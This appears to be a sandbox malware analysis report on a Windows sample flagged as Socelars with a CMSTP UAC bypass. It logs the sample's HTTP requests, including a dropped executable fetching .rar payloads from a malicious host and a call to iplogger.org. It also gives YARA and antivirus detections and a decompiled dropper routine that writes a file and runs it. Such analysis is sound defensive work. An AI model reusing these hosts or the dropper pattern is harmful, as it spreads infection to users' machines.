                                                                                  3192.168.2.74970444.221.84.1057992876C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jul 24, 2024 17:33:03.514079094 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                  Host: ddos.dnsnb8.net:799
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.74970544.221.84.1057992876C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jul 24, 2024 17:33:06.272958994 CEST288OUTGET /cj//k3.rar HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                  Host: ddos.dnsnb8.net:799
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.74970644.221.84.1057992876C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jul 24, 2024 17:33:09.072983980 CEST288OUTGET /cj//k4.rar HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                  Host: ddos.dnsnb8.net:799
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.74970844.221.84.1057992876C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jul 24, 2024 17:33:12.026657104 CEST288OUTGET /cj//k5.rar HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                  Host: ddos.dnsnb8.net:799
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.749700172.232.25.1484433212C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-07-24 15:33:00 UTC193OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                  Host: www.icodeps.com
                                                                                  Cache-Control: no-cache
                                                                                  2024-07-24 15:33:00 UTC315INHTTP/1.1 302 Moved Temporarily
                                                                                  Server: openresty
                                                                                  Date: Wed, 24 Jul 2024 15:33:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 142
                                                                                  Connection: close
                                                                                  Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                  Location: http://ww99.icodeps.com/
                                                                                  Cache-Control: no-store, max-age=0
                                                                                  2024-07-24 15:33:00 UTC142INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.749703172.67.132.1134433212C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-07-24 15:33:03 UTC196OUTGET /1NpYz7 HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                  Host: iplogger.org
                                                                                  Cache-Control: no-cache
                                                                                  2024-07-24 15:33:03 UTC1030INHTTP/1.1 200 OK
                                                                                  Date: Wed, 24 Jul 2024 15:33:03 GMT
                                                                                  Content-Type: image/png
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  set-cookie: 34765079137263905=1; expires=Thu, 24 Jul 2025 15:33:03 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                  set-cookie: clhf03028ja=8.46.123.33; expires=Thu, 24 Jul 2025 15:33:03 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                  memory: 0.41240692138671875
                                                                                  expires: Wed, 24 Jul 2024 15:33:03 +0000
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  strict-transport-security: max-age=31536000
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VEXAO7DJe20H%2BZ2xyrxBItk6AZc5qYiyz24%2FVqDGT%2BGrk7Ugfy9AvmErMh9W%2F8x84vySyJEcdk8R9%2F%2B0%2FmGZsd8f5A6H3BcgjaBj5kVWzTZL5bc3kXZwArQJ6lJ9WfY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8a84f767bc178c1b-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-07-24 15:33:03 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                  Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                  2024-07-24 15:33:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:4
                                                                                  Start time:11:32:56
                                                                                  Start date:24/07/2024
                                                                                  Path:C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe"
                                                                                  Imagebase:0xb10000
                                                                                  File size:1'803'264 bytes
                                                                                  MD5 hash:7BB46178F57F6EA01347B1790D7BFA27
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000000.1333766493.0000000000C56000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:11:32:56
                                                                                  Start date:24/07/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe
                                                                                  Imagebase:0xad0000
                                                                                  File size:15'872 bytes
                                                                                  MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 92%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:10
                                                                                  Start time:11:33:05
                                                                                  Start date:24/07/2024
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 2052
                                                                                  Imagebase:0xdd0000
                                                                                  File size:483'680 bytes
                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:14
                                                                                  Start time:11:33:20
                                                                                  Start date:24/07/2024
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1524
                                                                                  Imagebase:0xdd0000
                                                                                  File size:483'680 bytes
                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:0.5%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:5.1%
                                                                                    Total number of Nodes:158
                                                                                    Total number of Limit Nodes:23
                                                                                    execution_graph 73707 bfbc38 73710 c0d859 73707->73710 73709 bfbc50 73711 c0d864 RtlFreeHeap 73710->73711 73715 c0d88d __dosmaperr 73710->73715 73712 c0d879 73711->73712 73711->73715 73716 bff0a9 14 API calls __dosmaperr 73712->73716 73714 c0d87f GetLastError 73714->73715 73715->73709 73716->73714 73717 ba6630 73720 ba9550 73717->73720 73719 ba663f task 73721 ba9580 Concurrency::details::VirtualProcessorRoot::Subscribe Concurrency::details::ContextBase::GetWorkQueueIdentity ctype Concurrency::cancellation_token_source::~cancellation_token_source 73720->73721 73722 ba95c4 Concurrency::task_continuation_context::task_continuation_context 73721->73722 73724 ba9d90 73721->73724 73722->73719 73727 ba3c40 73724->73727 73726 ba9da4 73726->73722 73728 ba3c78 Concurrency::wait 73727->73728 73729 ba3c6b 73727->73729 73728->73726 73731 ba7570 6 API calls _Allocate 73729->73731 73731->73728 73732 bab5b0 73735 ba49c0 73732->73735 73734 bab5c3 73736 ba49fc construct 73735->73736 73738 ba49e5 construct 73735->73738 73739 ba3d20 73736->73739 73738->73734 73740 ba3d57 Concurrency::details::VirtualProcessorRoot::Subscribe 73739->73740 73742 ba3d99 73740->73742 73751 ba9710 16 API calls std::_Xinvalid_argument 73740->73751 73747 ba9750 73742->73747 73744 ba3dbd construct 73752 ba77f0 6 API calls 4 library calls 73744->73752 73746 ba3ebe 73746->73738 73748 ba9760 allocator 73747->73748 73753 ba3970 73748->73753 73751->73742 73752->73746 73754 ba398a 73753->73754 73755 ba397c 73753->73755 73757 ba3985 73754->73757 73767 ba75f0 73754->73767 73759 ba39b0 73755->73759 73757->73744 73760 ba39cc 73759->73760 73761 ba39c7 73759->73761 73763 ba75f0 _Allocate 16 API calls 73760->73763 73770 ba92b0 KiUserExceptionDispatcher stdext::threads::lock_error::lock_error Concurrency::cancel_current_task 73761->73770 73765 ba39d5 73763->73765 73766 ba39f0 73765->73766 73771 bfbae2 6 API calls __Getcoll 73765->73771 73766->73757 73772 bf51e2 73767->73772 73770->73760 73776 bf51e7 73772->73776 73774 ba75fc 73774->73757 73776->73774 73778 bf5203 Concurrency::cancel_current_task 73776->73778 73782 bfb91b 73776->73782 73789 c0807d EnterCriticalSection LeaveCriticalSection messages 73776->73789 73777 bf5f61 stdext::threads::lock_error::lock_error 73779 bf7ddf Concurrency::cancel_current_task KiUserExceptionDispatcher 73777->73779 73778->73777 73790 bf7ddf 73778->73790 73781 bf5f7e 73779->73781 73787 c0d52d __dosmaperr 73782->73787 73783 c0d56b 73794 bff0a9 14 API calls __dosmaperr 73783->73794 73785 c0d556 RtlAllocateHeap 73786 c0d569 73785->73786 73785->73787 73786->73776 73787->73783 73787->73785 73793 c0807d EnterCriticalSection LeaveCriticalSection messages 73787->73793 73789->73776 73791 bf7e26 KiUserExceptionDispatcher 73790->73791 73792 bf7df9 73790->73792 73791->73777 73792->73791 73793->73787 73794->73786 73795 ba5770 73796 ba57a8 numpunct 73795->73796 73799 ba9a00 73796->73799 73798 ba57d9 Concurrency::details::ContextBase::GetWorkQueueIdentity numpunct 73800 ba9a10 construct char_traits 73799->73800 73803 ba9a30 73800->73803 73802 ba9a29 73802->73798 73804 ba9a88 73803->73804 73806 ba9a44 std::runtime_error::runtime_error Concurrency::task_continuation_context::task_continuation_context 73803->73806 73807 ba40e0 73804->73807 73806->73802 73808 ba40fb std::runtime_error::runtime_error 73807->73808 73810 ba4105 Concurrency::details::VirtualProcessorRoot::Subscribe Concurrency::task_continuation_context::task_continuation_context 73808->73810 73815 ba9700 16 API calls std::_Xinvalid_argument 73808->73815 73811 ba9750 allocator 22 API calls 73810->73811 73812 ba4140 construct Concurrency::details::ContextBase::GetWorkQueueIdentity numpunct 73811->73812 73813 ba9d90 allocator 6 API calls 73812->73813 73814 ba4195 std::runtime_error::runtime_error numpunct 73812->73814 73813->73814 73814->73806 73815->73810 73816 bae7e0 73817 bae7fd __vfwprintf_l 73816->73817 73820 bac660 73817->73820 73821 bac678 __vfwprintf_l 73820->73821 73824 bfed2f 73821->73824 73823 bac684 73825 bfed5f 73824->73825 73826 bfed74 73824->73826 73840 bff0a9 14 API calls __dosmaperr 73825->73840 73826->73825 73828 bfed78 73826->73828 73832 bfbc53 73828->73832 73830 bfed64 std::locale::_Setgloballocale 73830->73823 73833 bfbc5f __fread_nolock 73832->73833 73841 bff008 EnterCriticalSection 73833->73841 73835 bfbc6d 73842 bfc90f 73835->73842 73837 bfbc7a 73853 bfbca2 LeaveCriticalSection __fread_nolock 73837->73853 73839 bfbc8b 73839->73823 73840->73830 73841->73835 73854 c0e74e 15 API calls 3 library calls 73842->73854 73844 bfc932 73855 bfc83e 42 API calls 2 library calls 73844->73855 73846 bfc949 __vfwprintf_l 73856 bfcc4f 73846->73856 73848 bfc98d 73867 bfc8d1 14 API calls _free 73848->73867 73850 bfc99a 73868 c0e7fa 65 API calls __vfwprintf_l 73850->73868 73852 bfc9bc numpunct 73852->73837 73853->73839 73854->73844 73855->73846 73869 bfe814 14 API calls 3 library calls 73856->73869 73858 bfcc74 std::locale::_Setgloballocale 73858->73848 73859 bfcc6f 73876 bff0a9 14 API calls __dosmaperr 73859->73876 73861 bfcc60 __vfwprintf_l 73861->73858 73861->73859 73870 bfd13d 73861->73870 73877 bfde0c 42 API calls __vfwprintf_l 73861->73877 73878 bfd2ea 42 API calls __vfwprintf_l 73861->73878 73879 bfd337 45 API calls 3 library calls 73861->73879 73880 bfd74b 45 API calls __vfwprintf_l 73861->73880 73867->73850 73868->73852 73869->73861 73881 bfd19a 73870->73881 73872 bfd159 73872->73861 73873 bfd142 73873->73872 73884 bff0a9 14 API calls __dosmaperr 73873->73884 73875 bfd14b std::locale::_Setgloballocale 73875->73861 73876->73858 73877->73861 73878->73861 73879->73861 73880->73861 73885 bfd219 73881->73885 73883 bfd1aa __vfwprintf_l 73883->73873 73884->73875 73886 bfd23b __fassign __vfwprintf_l 73885->73886 73888 bfd270 std::locale::_Setgloballocale 73886->73888 73889 bff0a9 14 API calls __dosmaperr 73886->73889 73888->73883 73889->73888 73890 bb9690 73891 bb96c5 task 73890->73891 73898 bb4be0 73891->73898 73895 bb9709 73903 bb4a20 6 API calls task 73895->73903 73897 bb971c numpunct 73899 bb4bf2 construct 73898->73899 73900 bb4c10 73899->73900 73904 bb6330 73899->73904 73902 bbde90 22 API calls Concurrency::details::ContextBase::GetWorkQueueIdentity 73900->73902 73902->73895 73903->73897 73905 bb633f Concurrency::details::VirtualProcessorRoot::Subscribe ctype std::runtime_error::runtime_error 73904->73905 73906 ba9a30 numpunct 22 API calls 73905->73906 73907 bb6369 73906->73907 73907->73900 73908 c0d7fc 73913 c0d809 __dosmaperr 73908->73913 73909 c0d849 73916 bff0a9 14 API calls __dosmaperr 73909->73916 73910 c0d834 RtlAllocateHeap 73912 c0d847 73910->73912 73910->73913 73913->73909 73913->73910 73915 c0807d EnterCriticalSection LeaveCriticalSection messages 73913->73915 73915->73913 73916->73912 73917 cce000 73919 cce044 GetPEB 73917->73919 73920 cce077 CreateFileA 73919->73920 73922 cce22d 73920->73922 73923 cce265 73920->73923 73924 cce246 WriteFile 73922->73924 73925 cce244 73922->73925 73926 cce255 FindCloseChangeNotification WinExec 73924->73926 73925->73926 73926->73923

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 cce044-cce074 GetPEB 1 cce077-cce09a 0->1 2 cce09d-cce0a0 1->2 3 cce1ee-cce22b CreateFileA 2->3 4 cce0a6-cce0bc 2->4 24 cce22d-cce230 3->24 25 cce265-cce269 3->25 5 cce0be-cce0c5 4->5 6 cce110-cce116 4->6 5->6 10 cce0c7-cce0ce 5->10 8 cce118-cce11f 6->8 9 cce129-cce12f 6->9 8->9 11 cce121-cce124 8->11 12 cce148-cce14e 9->12 13 cce131-cce138 9->13 10->6 14 cce0d0-cce0d7 10->14 17 cce1bb-cce1c0 11->17 19 cce167-cce16f 12->19 20 cce150-cce157 12->20 13->12 18 cce13a-cce141 13->18 14->6 15 cce0d9-cce0dd 14->15 15->6 21 cce0df-cce0e3 15->21 27 cce1e0-cce1e9 17->27 28 cce1c2-cce1c5 17->28 18->12 26 cce143-cce146 18->26 22 cce188-cce18e 19->22 23 cce171-cce178 19->23 20->19 29 cce159-cce160 20->29 21->17 30 cce0e9-cce10b 21->30 32 cce1a7-cce1ad 22->32 33 cce190-cce197 22->33 23->22 31 cce17a-cce181 23->31 34 cce232-cce238 24->34 26->17 27->2 28->27 35 cce1c7-cce1ca 28->35 29->19 36 cce162-cce165 29->36 30->1 31->22 37 cce183-cce186 31->37 32->17 39 cce1af-cce1b6 32->39 33->32 38 cce199-cce1a0 33->38 40 cce23a-cce242 34->40 41 cce246-cce252 WriteFile 34->41 35->27 42 cce1cc-cce1cf 35->42 36->17 37->17 38->32 44 cce1a2-cce1a5 38->44 39->17 45 cce1b8 39->45 40->34 46 cce244 40->46 47 cce255-cce262 FindCloseChangeNotification WinExec 41->47 42->27 48 cce1d1-cce1d4 42->48 44->17 45->17 46->47 47->25 48->27 49 cce1d6-cce1d9 48->49 49->27 50 cce1db-cce1de 49->50 50->3 50->27
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00CCE223
                                                                                    • WriteFile.KERNEL32(00000000,FFF27CB2,00003E00,?,00000000), ref: 00CCE252
                                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 00CCE256
                                                                                    • WinExec.KERNEL32(?,00000005), ref: 00CCE262
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                                                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$MDSxhU.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                                                                    • API String ID: 2234911746-2779600347
                                                                                    • Opcode ID: 1eaa05c89f9a16db100e5812921f00c49ecaaa01fb49a0749a5cf9e816e7b43f
                                                                                    • Instruction ID: 526c3aab0ba8c77ebfd68f8c3d0612f2d48cb673479f328e0da8f3d5c89f0fd2
                                                                                    • Opcode Fuzzy Hash: 1eaa05c89f9a16db100e5812921f00c49ecaaa01fb49a0749a5cf9e816e7b43f
                                                                                    • Instruction Fuzzy Hash: 65612674D01215DBCF24CF94C884FADB7B4BF46311F2986AEE415AB642C3749E91CB91

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00BAAF30: _Max_value.LIBCPMTD ref: 00BAAF66
                                                                                      • Part of subcall function 00BAAF30: _Min_value.LIBCPMTD ref: 00BAAF8C
                                                                                    • allocator.LIBCONCRTD ref: 00BA413B
                                                                                    • allocator.LIBCONCRTD ref: 00BA4190
                                                                                      • Part of subcall function 00BA9700: std::_Xinvalid_argument.LIBCPMT ref: 00BA9708
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: allocator$Max_valueMin_valueXinvalid_argumentstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 3868691235-0
                                                                                    • Opcode ID: d193d09c83b55e227e307a07a912722911a3cdd274cadc6628691a6970a92002
                                                                                    • Instruction ID: 8530f024f805a865f3633bd7eac93721c1f84821e9539cddc2f85259ba26b05b
                                                                                    • Opcode Fuzzy Hash: d193d09c83b55e227e307a07a912722911a3cdd274cadc6628691a6970a92002
                                                                                    • Instruction Fuzzy Hash: D231C275E14109EFCB04EFA8D8919AEB7F5FF49300F108599E915A7351DB30AE40CB91

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00BAAFB0: _Min_value.LIBCPMTD ref: 00BAAFDD
                                                                                    • allocator.LIBCONCRTD ref: 00BA3DB8
                                                                                      • Part of subcall function 00BA9710: std::_Xinvalid_argument.LIBCPMT ref: 00BA9718
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Min_valueXinvalid_argumentallocatorstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 3360247935-0
                                                                                    • Opcode ID: f42abb30bd38c9e944b08fc110b9ced9c6ff1cedd2fde62cc255a0f01486ea71
                                                                                    • Instruction ID: c10564e054ba5cb6874654447dd00741a4e5603a72b22dba2a1ad687de32af56
                                                                                    • Opcode Fuzzy Hash: f42abb30bd38c9e944b08fc110b9ced9c6ff1cedd2fde62cc255a0f01486ea71
                                                                                    • Instruction Fuzzy Hash: 0651AFB5E04109AFCB04DF98D9919AEF7F6FF89314F208269E519A7351DB31AD01CBA0

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: allocator
                                                                                    • String ID:
                                                                                    • API String ID: 3447690668-0
                                                                                    • Opcode ID: b54121794e8d50cf0c67dd1dd1a3a1254fd6c6fc93c71a6bedaeec662d4b0b05
                                                                                    • Instruction ID: 2581f0a33552745967a8d1c44ba595d677bfbd3783f8505617fc02f7ba908f9e
